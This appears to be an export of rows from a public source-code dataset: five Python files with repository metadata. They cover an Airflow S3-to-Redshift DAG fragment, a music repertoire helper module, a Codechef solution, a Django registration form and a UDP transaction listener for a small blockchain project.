task_id=f"create_{table}_table",
dag=dag,
postgres_conn_id=redshift_conn_id,
sql=create_sql_stmt
)
copy_task = S3ToRedshiftOperator(
task_id=f"load_{table}_from_s3_to_redshift",
dag=dag,
table=table,
redshift_conn_id=redshift_conn_id,
aws_credentials_id=aws_credentials_id,
s3_bucket=s3_bucket,
s3_key=s3_key
)
#
# TODO: Move the HasRowsOperator task here from the DAG
#
create_task >> copy_task
#
# TODO: Use DAG ordering to place the check task
#
return dag
| [
"f339339@gmail.com"
] | f339339@gmail.com |
ca9a92d1612494dd95fd85bed22d1c0fab8da6d2 | 1c9aa8f755f0a4beb60db8e006a36d56ab8d8d68 | /src/common.py | cb5930b381480ac553db62c28919722b1349cf92 | [] | no_license | silverfield/repertoire-mng | 1e7b457014b75b66d42a8008570f0582eb395da1 | a99c9937269f07773458aa312fc18ba34f165e31 | refs/heads/master | 2021-01-01T08:05:01.118859 | 2020-11-22T20:54:10 | 2020-11-22T20:54:10 | 239,187,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,997 | py | import os
import json
cur_dir = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = f'{cur_dir}/../data'
OUTPUT_DIR = f'{cur_dir}/../output'
TYPE_BT = 'bt'
TYPE_NBT = 'nbt'
ON_LINUX = os.path.exists('/opt')
PREFIX = '/d'
if not ON_LINUX:
PREFIX = 'G:'
PDF_DIRS = [f'{PREFIX}/music/akordy/chords', f'{PREFIX}/music/akordy/fero-hajnovic']
REPE_FOLDER = f'{PREFIX}/music/repertoire'
WEBSITE_DATA_DIR = '/home/fero/wspace/fhweb/src/data'
if not ON_LINUX:
WEBSITE_DATA_DIR = 'G:/wspace/fhweb/fhweb/src/data'
def mkdir(d):
if not os.path.exists(d):
os.makedirs(d)
mkdir(DATA_DIR)
mkdir(OUTPUT_DIR)
COMMON_ABBRS = {
'FH': 'Fero Hajnovic',
'DS': 'Dire Straits',
'MK': 'Mark Knopfler',
'EC': 'Eric Clapton',
'PF': 'Pink Floyd',
}
def get_artist(item, expand_abbrs=False):
artist = item.split(' - ')[0]
if expand_abbrs:
if artist in COMMON_ABBRS:
artist = COMMON_ABBRS[artist]
return artist
def get_name(item):
return item.split(' - ')[1]
def get_full_name(item, expand_artist_abbrs=False):
return f'{get_artist(item, expand_artist_abbrs)} - {get_name(item)}'
def is_bt(item):
return item.split(' - ')[-1] == 'BT'
# Load per-song properties and fail fast if any song has no tags.
with open(f'{DATA_DIR}/song-props.json', 'r') as f:
    PROPS = json.loads(f.read())
if any(len(i['tags']) == 0 for i in PROPS):
    no_tags_props = [i['name'] for i in PROPS if len(i['tags']) == 0]
    raise ValueError(f'Tags not specified for {no_tags_props}')
# Re-index by lower-cased full song name for case-insensitive lookups.
PROPS = {i['name'].lower(): i for i in PROPS}
# print(PROPS)
def get_song_props(item):
key = get_full_name(item, expand_artist_abbrs=True).lower()
if key in PROPS:
return PROPS[key]
err_msg = f'{item} not found in props'
print(err_msg)
print('Maybe add something like this to song-props.json:')
print(json.dumps({
"name": item,
"tags": [],
"used": True,
"versions": ['nbt'],
"loop": None
}, indent=4))
raise KeyError(err_msg) | [
"ferohajnovic@gmail.com"
] | ferohajnovic@gmail.com |
4998d14e229e37f835bbecc90cd2f99ce4d68860 | 78efa54b2b253f99ea7e073f783e6121c20cdb52 | /Codechef/Maximize The Sum.py | 6c263f96896aaeb642979ffca927fdf582635a67 | [] | no_license | NishchaySharma/Competitve-Programming | 32a93581ab17f05d20129471f7450f34ec68cc53 | 1ec44324d64c116098eb0beb74baac7f1c3395bb | refs/heads/master | 2020-04-08T04:02:46.599398 | 2020-01-01T15:51:39 | 2020-01-01T15:51:39 | 159,000,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | for _ in range(int(input())):
n=int(input())
arr=sorted(list(map(int,input().split())))
res=0
for i in range(n//2):
res+=abs(arr[i]-arr[n-i-1])
print(res)
| [
"noreply@github.com"
] | noreply@github.com |
5b50487270c74172bed04c7f6257121b2eacd2c0 | be937643b2d7a8ae86b87bfb286c2119fe8423c3 | /authentication/forms.py | 4b91e273758d346b7714f21fcd824fa56037c5c9 | [] | no_license | Detharion91/django-tickets-app | 58f8a4151bea424517a4e2c102e09e6bc5e9c38d | cfbcf19b373aa6412a2904a7386d82a8e0139744 | refs/heads/master | 2020-03-30T13:24:18.603969 | 2018-10-02T14:54:59 | 2018-10-02T14:54:59 | 151,271,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | from django import forms
from django.utils.translation import gettext_lazy as _
from django.contrib.auth.models import User
class RegisterForm(forms.ModelForm):
password = forms.CharField(label=_('Password'), widget=forms.PasswordInput)
password2 = forms.CharField(label=_('Confirm Password'), widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'email',)
def clean_password2(self):
password = self.cleaned_data.get('password')
password2 = self.cleaned_data.get('password2')
if password2 != password:
raise forms.ValidationError(_('Password does not match'))
return password2
def clean_username(self):
username = self.cleaned_data.get('username')
user = User.objects.filter(username=username)
if user:
raise forms.ValidationError(_('Username already exists'))
return username
def save(self, commit=True):
user = super(RegisterForm, self).save(commit=False)
user.set_password(self.cleaned_data.get('password'))
if commit:
user.save()
return user | [
"ghernandezdelrosario@gmail.com"
] | ghernandezdelrosario@gmail.com |
ca962831629656a8d9a0b99cd1a750b6fb3b06eb | 24a7c711c15c70fc2961ce9bdbada50ac0aafa01 | /src/blockchain/miner/services/transaction_listener.py | cb927614faee5331135afdf80a4c4a9f4fa58e09 | [] | no_license | thaolt/blockchain | bad75f4eea2d2886e23e69429bc0dedf99fe1b0e | 582ecb10c0ecb97583c8d814242fca5ef1100b23 | refs/heads/master | 2020-04-02T22:10:37.233766 | 2018-04-01T09:33:46 | 2018-04-01T09:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,667 | py | from socket import *
from threading import Thread
import logging
import sys
from blockchain.common.utils import bytes_to_text
from blockchain.common.encoders import transaction_decode
# Label used in log messages emitted by this service.
SERVICE_NAME = 'Transaction Listener'
# Maximum datagram size read per recvfrom() call (1 MiB).
BUFFER_SIZE = 1024 * 1024
# NOTE(review): unused in this module (UDP sockets take no listen backlog) —
# confirm before removing.
BACKLOG_SIZE = 3
class TransactionListener(Thread):
def __init__(self, listener_port, shutdown_event, on_new_transaction):
Thread.__init__(self)
self.listener_port = listener_port
self.shutdown_event = shutdown_event
self.on_new_transaction = on_new_transaction
def run(self):
self.socket = socket(AF_INET, SOCK_DGRAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
self.socket.bind(('', self.listener_port))
logging.info('{} listening for new transactions on port {}...'.format(SERVICE_NAME, self.listener_port))
while not self.shutdown_event.is_set():
try:
bytes, addr = self.socket.recvfrom(BUFFER_SIZE)
transaction_text = bytes_to_text(bytes)
transaction = transaction_decode(transaction_text)
logging.info('{} received new transaction for amount {} from {}'.format(SERVICE_NAME, transaction.amount, addr[0]))
self.on_new_transaction(transaction)
except OSError:
logging.debug('{} error: {}'.format(SERVICE_NAME, sys.exc_info()))
pass # probably close() was called
except Exception:
logging.error('{} error: {}'.format(SERVICE_NAME, sys.exc_info()))
logging.info('{} shut down'.format(SERVICE_NAME))
def close(self):
self.socket.close()
| [
"rob@codebox.org.uk"
] | rob@codebox.org.uk |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.